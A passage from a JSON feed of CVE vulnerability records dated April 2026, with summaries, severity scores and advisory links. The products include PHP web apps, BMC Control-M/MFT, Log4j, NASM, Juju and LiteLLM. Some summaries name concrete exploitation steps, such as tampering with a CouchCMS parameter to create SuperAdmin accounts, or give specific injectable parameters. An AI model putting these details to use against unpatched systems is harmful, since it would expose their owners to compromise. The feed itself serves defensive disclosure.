2.3.0.","cvss":7.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":null,"epss":0.00038,"ranking_epss":0.11187,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8jvc-mcx6-r4cg","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8jvc-mcx6-r4cg"],"published_time":"2026-04-10T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23781","summary":"An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. A set of default debug user credentials is hardcoded in cleartext within the application package. If left unchanged, these credentials can be easily obtained and may allow unauthorized access to the MFT API debug interface.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00022,"ranking_epss":0.05866,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://docs.bmc.com/xwiki/bin/view/Control-M-Orchestration/Control-M/ctm9022/Patches/Control-M-MFT-PAAFP-9-0-22-025/","https://www.bmc.com/support/resources/issue-defect-management.html"],"published_time":"2026-04-10T16:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-29002","summary":"CouchCMS contains a privilege escalation vulnerability that allows authenticated Admin-level users to create SuperAdmin accounts by tampering with the f_k_levels_list parameter in user creation requests. Attackers can modify the parameter value from 4 to 10 in the HTTP request body to bypass authorization validation and gain full application control, circumventing restrictions on SuperAdmin account creation and privilege assignment.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":8.6,"epss":0.00034,"ranking_epss":0.09857,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gist.github.com/thepiyushkumarshukla/477e2d2bbbe8cc3ec0d640c50f0cf9e1","https://www.couchcms.com/","https://www.vulncheck.com/advisories/couchcms-privilege-escalation-via-f-k-levels-list-parameter"],"published_time":"2026-04-10T16:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-29043","summary":"HDF5 is software for managing data. In 1.14.1-2 and earlier, an attacker who can control an h5 file parsed by HDF5 can trigger a write-based heap buffer overflow condition in the H5T__ref_mem_setnull method. This can lead to a denial-of-service condition, and potentially further issues such as remote code execution depending on the practical exploitability of the heap overflow against modern operating systems.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.12024,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/HDFGroup/hdf5/security/advisories/GHSA-qm2m-5g5w-2277"],"published_time":"2026-04-10T16:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34477","summary":"The fix for  CVE-2025-68161 https://logging.apache.org/security.html#CVE-2025-68161  was incomplete: it addressed hostname verification only when enabled via the  log4j2.sslVerifyHostName https://logging.apache.org/log4j/2.x/manual/systemproperties.html#log4j2.sslVerifyHostName  system property, but not when configured through the  verifyHostName https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName  attribute of the <Ssl> element.\n\nAlthough the verifyHostName configuration attribute was introduced in Log4j Core 2.12.0, it was silently ignored in all versions through 2.25.3, leaving TLS connections vulnerable to interception regardless of the configured value.\n\nA network-based attacker may be able to perform a man-in-the-middle attack when all of the following conditions are met:\n\n  *  An SMTP, Socket, or Syslog appender is in use.\n  *  TLS is configured via a nested <Ssl> element.\n  *  The attacker can present a certificate issued by a CA trusted by the appender's configured trust store, or by the default Java trust store if none is configured.\nThis issue does not affect users of the HTTP appender, which uses a separate  verifyHostname https://logging.apache.org/log4j/2.x/manual/appenders/network.html#HttpAppender-attr-verifyHostName  attribute that was not subject to this bug and verifies host names by default.\n\nUsers are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00108,"ranking_epss":0.29071,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/logging-log4j2/pull/4075","https://lists.apache.org/thread/lkx8cl46t2bvkcwfcb2pd43ygc097lq4","https://logging.apache.org/cyclonedx/vdr.xml","https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName","https://logging.apache.org/security.html#CVE-2026-34477"],"published_time":"2026-04-10T16:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36235","summary":"A SQL injection vulnerability was found in the scheduleSubList.php file of itsourcecode Online Student Enrollment System v1.0. The reason for this issue is that the 'subjcode' parameter is directly embedded into the SQL query via string interpolation without any sanitization or validation.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Amorsec/CVE-PHP/blob/main/itsourcecode-Online_Student_Enrollment_System_in_scheduleSubList.php_sql_injection.pdf"],"published_time":"2026-04-10T15:16:25","vendor":"itsourcecode","product":"online_student_enrollment_system","version":null},{"cve_id":"CVE-2026-36236","summary":"SourceCodester Engineers Online Portal v1.0 is vulnerable to SQL Injection in update_password.php via the new_password parameter.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Amorsec/CVE-PHP/blob/main/sourcecodester-Engineers_Online_Portal_in_PHP_update_password.php_sql_injection.pdf"],"published_time":"2026-04-10T15:16:25","vendor":"janobe","product":"engineers_online_portal","version":null},{"cve_id":"CVE-2026-36232","summary":"A SQL injection vulnerability was found in the instructorClasses.php file of itsourcecode Online Student Enrollment System v1.0. The reason for this issue is that the 'classId' parameter from $_GET['classId'] is directly concatenated into the SQL query without any sanitization or validation.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Amorsec/CVE-PHP/blob/main/itsourcecode-Online_Student_Enrollment_System_in_instructorClasses.php_sql_injection.pdf"],"published_time":"2026-04-10T15:16:24","vendor":"itsourcecode","product":"online_student_enrollment_system","version":null},{"cve_id":"CVE-2026-36233","summary":"A SQL injection vulnerability was found in the assignInstructorSubjects.php file of itsourcecode Online Student Enrollment System v1.0. The reason for this issue is that attackers can inject malicious code via the parameter \"subjcode\" and use it directly in SQL queries without the need for appropriate cleaning or validation.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Amorsec/CVE-PHP/blob/main/itsourcecode-Online_Student_Enrollment_System_in_assignInstructorSubjects.php_sql_injection.pdf"],"published_time":"2026-04-10T15:16:24","vendor":"itsourcecode","product":"online_student_enrollment_system","version":null},{"cve_id":"CVE-2026-36234","summary":"itsourcecode Online Student Enrollment System v1.0 is vulnerable to SQL Injection in newCourse.php via the 'coursename' parameter.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Amorsec/CVE-PHP/blob/main/itsourcecode-Online_Student_Enrollment_System_in_newCourse.php_sql_injection.pdf"],"published_time":"2026-04-10T15:16:24","vendor":"itsourcecode","product":"online_student_enrollment_system","version":null},{"cve_id":"CVE-2026-23780","summary":"An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. A SQL injection vulnerability in the MFT API's debug interface allows an authenticated attacker to inject malicious queries due to improper input validation and unsafe dynamic SQL handling. Successful exploitation can enable arbitrary file read/write operations and potentially lead to remote code execution.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":0.00042,"ranking_epss":0.12773,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://docs.bmc.com/xwiki/bin/view/Control-M-Orchestration/Control-M/ctm9022/Patches/Control-M-MFT-PAAFP-9-0-22-025/","https://www.bmc.com/support/resources/issue-defect-management.html"],"published_time":"2026-04-10T15:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23782","summary":"An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. An API management endpoint allows unauthenticated users to obtain both an API identifier and its corresponding secret value. With these exposed secrets, an attacker could invoke privileged API operations, potentially leading to unauthorized access.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07788,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://docs.bmc.com/xwiki/bin/view/Control-M-Orchestration/Control-M/ctm9021/Patches/Control-M-Server-PACTV-9-0-21-308/?srid=ab0apVT3","https://www.bmc.com/support/resources/issue-defect-management.html"],"published_time":"2026-04-10T15:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-29861","summary":"PHP-MYSQL-User-Login-System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at login.php.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/amanyadav78/CVE-2026-29861"],"published_time":"2026-04-10T15:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31262","summary":"Cross Site Scripting vulnerability in Altenar Sportsbook Software Platform (SB2) v.2.0 allows a remote attacker to obtain sensitive information and execute arbitrary code via the URL parameter","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00058,"ranking_epss":0.17954,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/nikolas-ch/CVEs/blob/main/Altenar_SportsBook_Platform_SB2/ORtoXSS/ORtoXSS.txt","https://github.com/nikolas-ch/CVEs/tree/main/Altenar_SportsBook_Platform_SB2/ORtoXSS"],"published_time":"2026-04-10T15:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-44560","summary":"owntone-server 2ca10d9 is vulnerable to Buffer Overflow due to lack of recursive checking.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gist.github.com/wenwenyuyu/517851c3fe38c4f97b2d1940597da2d3","https://github.com/owntone/owntone-server/issues/1873"],"published_time":"2026-04-10T15:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6067","summary":"A heap buffer overflow vulnerability exists in the Netwide Assembler (NASM) due to a lack of bounds checking in the obj_directive() function. This vulnerability can be exploited by a user assembling a malicious .asm file, potentially leading to heap memory corruption, denial of service (crash), and arbitrary code execution.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00056,"ranking_epss":0.17556,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/netwide-assembler/nasm/issues/203"],"published_time":"2026-04-10T14:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6068","summary":"NASM contains a heap use after free vulnerability in response file (-@) processing where a dangling pointer to freed memory is stored in the global depend_file and later dereferenced, as the response-file buffer is freed before the pointer is used, allowing for data corruption or unexpected behavior.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07701,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/netwide-assembler/nasm/issues/222"],"published_time":"2026-04-10T14:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6069","summary":"NASM’s disasm() function contains a stack based buffer overflow when formatting disassembly output, allowing an attacker triggered out-of-bounds write when `slen` exceeds the buffer capacity.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.11987,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/netwide-assembler/nasm/issues/217"],"published_time":"2026-04-10T14:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40217","summary":"LiteLLM through 2026-04-08 allows remote attackers to execute arbitrary code via bytecode rewriting at the /guardrails/test_custom_code URI.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":0.00188,"ranking_epss":0.40669,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.x41-dsec.de/lab/advisories/x41-2026-001-litellm/"],"published_time":"2026-04-10T14:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33092","summary":"Local privilege escalation due to improper handling of environment variables. The following products are affected: Acronis True Image OEM (macOS) before build 42571, Acronis True Image (macOS) before build 42902.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02564,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security-advisory.acronis.com/advisories/SEC-9407"],"published_time":"2026-04-10T14:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-58913","summary":"Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CactusThemes VideoPro allows PHP Local File Inclusion.This issue affects VideoPro: from n/a through 2.3.8.1.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":0.00115,"ranking_epss":0.30058,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://patchstack.com/database/wordpress/theme/videopro/vulnerability/wordpress-videopro-theme-2-3-8-1-local-file-inclusion-vulnerability?_s_id=cve"],"published_time":"2026-04-10T14:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-58920","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zootemplate Cerato allows Reflected XSS.This issue affects Cerato: from n/a through 2.2.18.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00033,"ranking_epss":0.09585,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://patchstack.com/database/wordpress/theme/cerato/vulnerability/wordpress-cerato-theme-2-2-18-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"],"published_time":"2026-04-10T14:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-5804","summary":"Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Case Themes Case Theme User allows PHP Local File Inclusion.This issue affects Case Theme User: from n/a before 1.0.4.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00067,"ranking_epss":0.20721,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://patchstack.com/database/wordpress/plugin/case-theme-user/vulnerability/wordpress-case-theme-user-1-0-4-local-file-inclusion-vulnerability?_s_id=cve"],"published_time":"2026-04-10T14:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5774","summary":"Improper synchronization of the userTokens map in the API server in Canonical Juju 4.0.5, 3.6.20, and 2.9.56 may allow an authenticated user to possibly cause a denial of service on the server or possibly reuse a single-use discharge token.","cvss":6.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.0,"epss":0.00011,"ranking_epss":0.01398,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/juju/juju/pull/22205","https://github.com/juju/juju/pull/22206","https://github.com/juju/juju/security/advisories/GHSA-7m55-2hr4-pw78","https://github.com/juju/juju/security/advisories/GHSA-7m55-2hr4-pw78"],"published_time":"2026-04-10T13:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5412","summary":"In Juju versions prior to 2.9.57 and 3.6.21, an authorization issue exists in the Controller facade. An authenticated user can call the CloudSpec API method to extract the cloud credentials used to bootstrap the controller. This allows a low-privileged user to access sensitive credentials. This issue is resolved in Juju versions 2.9.57 and 3.6.21.","cvss":9.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.9,"cvss_v4":null,"epss":0.00037,"ranking_epss":0.10882,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/juju/juju/pull/22205","https://github.com/juju/juju/pull/22206","https://github.com/juju/juju/security/advisories/GHSA-w5fq-8965-c969"],"published_time":"2026-04-10T13:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5777","summary":"This vulnerability exists in the Atom 3x Projector due to improper exposure of the Android Debug Bridge (ADB) service over the local network without authentication or access controls. An unauthenticated attacker on the same network can exploit this vulnerability to obtain root-level access, leading to complete compromise of the targeted device.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.7,"epss":0.00012,"ranking_epss":0.01534,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0179"],"published_time":"2026-04-10T12:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39304","summary":"Denial of Service via Out of Memory vulnerability in Apache ActiveMQ Client, Apache ActiveMQ Broker, Apache ActiveMQ.\n\nActiveMQ NIO SSL transports do not correctly handle TLSv1.3 handshake KeyUpdates triggered by clients. This makes it possible for a client to rapidly trigger updates which causes the broker to exhaust all its memory in the SSL engine leading to DoS.\n\nNote: TLS versions before TLSv1.3 (such as TLSv1.2) are broken but are not vulnerable to OOM. Previous TLS versions require a full handshake renegotiation which causes a connection to hang but not OOM. This is fixed as well.\nThis issue affects Apache ActiveMQ Client: before 5.19.4, from 6.0.0 before 6.2.4; Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.4; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.4.\n\nUsers are recommended to upgrade to version 6.2.4 or 5.19.5, which fixes the issue.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.1194,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://activemq.apache.org/security-advisories.data/CVE-2026-39304-announcement.txt","http://www.openwall.com/lists/oss-security/2026/04/09/17"],"published_time":"2026-04-10T11:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31412","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_mass_storage: Fix potential integer overflow in check_command_size_in_blocks()\n\nThe `check_command_size_in_blocks()` function calculates the data size\nin bytes by left shifting `common->data_size_from_cmnd` by the block\nsize (`common->curlun->blkbits`). However, it does not validate whether\nthis shift operation will cause an integer overflow.\n\nInitially, the block size is set up in `fsg_lun_open()` , and the\n`common->data_size_from_cmnd` is set up in `do_scsi_command()`. During\ninitialization, there is no integer overflow check for the interaction\nbetween two variables.\n\nSo if a malicious USB host sends a SCSI READ or WRITE command\nrequesting a large amount of data (`common->data_size_from_cmnd`), the\nleft shift operation can wrap around. This results in a truncated data\nsize, which can bypass boundary checks and potentially lead to memory\ncorruption or out-of-bounds accesses.\n\nFix this by using the check_shl_overflow() macro to safely perform the\nshift and catch any overflows.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.0001,"ranking_epss":0.01121,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/228b37936376143f4b60cc6828663f6eaceb81b5","https://git.kernel.org/stable/c/3428dc5520c811e66622b2f5fa43341bf9a1f8b3","https://git.kernel.org/stable/c/387ebb0453b99d71491419a5dc4ab4bee0cacbac","https://git.kernel.org/stable/c/8479891d1f04a8ce55366fe4ca361ccdb96f02e1","https://git.kernel.org/stable/c/91817ad5452defe69bc7bc0e355f0ed5d01125cc","https://git.kernel.org/stable/c/ce0caaed5940162780c5c223b8ae54968a5f059b"],"published_time":"2026-04-10T11:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4162","summary":"The Gravity SMTP plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.1.4. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to uninstall and deactivate the plugin and delete plugin options. NOTE: This vulnerability is also exploitable via a Cross-Site Request Forgery vector.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10384,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.gravityforms.com/brand-new-release-gravity-smtp-2-1-5/","https://www.wordfence.com/threat-intel/vulnerabilities/id/0f9d18a4-262b-4011-91e9-b29a27a76470?source=cve"],"published_time":"2026-04-10T10:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6057","summary":"FalkorDB Browser 1.9.3 contains an unauthenticated path traversal vulnerability in the file upload API that allows remote attackers to write arbitrary files and achieve remote code execution.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00111,"ranking_epss":0.29463,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/FalkorDB/falkordb-browser","https://github.com/FalkorDB/falkordb-browser/pull/1611"],"published_time":"2026-04-10T10:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2021-47961","summary":"A plaintext storage of a password vulnerability in Synology SSL VPN Client before 1.4.5-0684 allows remote attackers to access or influence the user's PIN code due to insecure storage. This may lead to unauthorized VPN configuration and potential interception of subsequent VPN traffic when combined with user interaction.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":0.00041,"ranking_epss":0.12262,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.synology.com/en-global/security/advisory/Synology_SA_26_05"],"published_time":"2026-04-10T10:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2021-47960","summary":"A files or directories accessible to external parties vulnerability in Synology SSL VPN Client before 1.4.5-0684 allows remote attackers to access files within the installation directory via a local HTTP server bound to the loopback interface. By leveraging user interaction with a crafted web page, attackers may retrieve sensitive files such as configuration files, certificates, and logs, leading to information disclosure.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07889,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.synology.com/en-global/security/advisory/Synology_SA_26_05"],"published_time":"2026-04-10T10:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6037","summary":"A vulnerability was determined in code-projects Vehicle Showroom Management System 1.0. This affects an unknown function of the file /util/AddVehicleFunction.php. This manipulation of the argument BRANCH_ID causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/TAnNbR/CVE/issues/4","https://vuldb.com/submit/796232","https://vuldb.com/vuln/356618","https://vuldb.com/vuln/356618/cti"],"published_time":"2026-04-10T09:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6038","summary":"A vulnerability was identified in code-projects Vehicle Showroom Management System 1.0. This impacts an unknown function of the file /util/RegisterCustomerFunction.php. Such manipulation of the argument BRANCH_ID leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/mrpgi/cve/issues/3","https://vuldb.com/submit/796281","https://vuldb.com/vuln/356619","https://vuldb.com/vuln/356619/cti"],"published_time":"2026-04-10T09:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6042","summary":"A security flaw has been discovered in musl libc up to 1.2.6. Affected is the function iconv of the file src/locale/iconv.c of the component GB18030 4-byte Decoder. Performing a manipulation results in inefficient algorithmic complexity. The attack must be initiated from a local position. To fix this issue, it is recommended to deploy a patch.","cvss":4.8,"cvss_version":4.0,"cvss_v2":1.7,"cvss_v3":3.3,"cvss_v4":4.8,"epss":0.00013,"ranking_epss":0.02047,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://vuldb.com/submit/796352","https://vuldb.com/vuln/356620","https://vuldb.com/vuln/356620/cti","https://www.openwall.com/lists/oss-security/2026/04/02/10","https://www.openwall.com/lists/oss-security/2026/04/03/2","http://www.openwall.com/lists/oss-security/2026/04/09/19"],"published_time":"2026-04-10T09:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33456","summary":"Livestatus injection in the notification test mode in Checkmk <2.5.0b4 and <2.4.0p26 allows an authenticated user with access to the notification test page to inject arbitrary Livestatus commands via a crafted service description.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.1,"epss":0.00039,"ranking_epss":0.11461,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://checkmk.com/werk/17989"],"published_time":"2026-04-10T09:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33457","summary":"Livestatus injection in the prediction graph page in Checkmk <2.5.0b4, <2.4.0p26, and <2.3.0p47 allows an authenticated user to inject arbitrary Livestatus commands via a crafted service name parameter due to insufficient sanitization of the service description value.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.00042,"ranking_epss":0.12568,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://checkmk.com/werk/17990"],"published_time":"2026-04-10T09:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6036","summary":"A vulnerability was found in code-projects Vehicle Showroom Management System 1.0. The impacted element is an unknown function of the file /util/VehicleDetailsFunction.php. The manipulation of the argument VEHICLE_ID results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/TAnNbR/CVE/issues/3","https://vuldb.com/submit/796201","https://vuldb.com/vuln/356617","https://vuldb.com/vuln/356617/cti"],"published_time":"2026-04-10T09:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33455","summary":"Livestatus injection in the monitoring quicksearch in Checkmk <2.5.0b4 allows an authenticated attacker to inject livestatus commands via the search query due to insufficient input sanitization in search filter plugins.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.00042,"ranking_epss":0.12568,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://checkmk.com/werk/17988"],"published_time":"2026-04-10T09:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6035","summary":"A vulnerability has been found in code-projects Vehicle Showroom Management System 1.0. The affected element is an unknown function of the file /BranchManagement/ServiceAndSalesReport.php. The manipulation of the argument BRANCH_ID leads to cross site scripting. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00033,"ranking_epss":0.09343,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/TAnNbR/CVE/issues/2","https://vuldb.com/submit/796200","https://vuldb.com/vuln/356616","https://vuldb.com/vuln/356616/cti"],"published_time":"2026-04-10T08:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5525","summary":"A stack-based buffer overflow vulnerability exists in Notepad++ version 8.9.3 in the file drop handler component. When a user drags and drops a directory path of exactly 259 characters without a trailing backslash, the application appends a backslash and null terminator without proper bounds checking, resulting in a stack buffer overflow and application crash (STATUS_STACK_BUFFER_OVERRUN).","cvss":6.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.0,"cvss_v4":null,"epss":0.00011,"ranking_epss":0.01367,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/notepad-plus-plus/notepad-plus-plus/commit/bfe7514d68bc559534c046c4ef2d1865267aa2b0","https://github.com/notepad-plus-plus/notepad-plus-plus/issues/17921","https://github.com/notepad-plus-plus/notepad-plus-plus/pull/17930","https://github.com/notepad-plus-plus/notepad-plus-plus/issues/17921"],"published_time":"2026-04-10T08:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6031","summary":"A vulnerability has been found in code-projects Simple IT Discussion Forum 1.0. This affects an unknown function of the file /add-category-function.php. Such manipulation of the argument Category leads to sql injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be 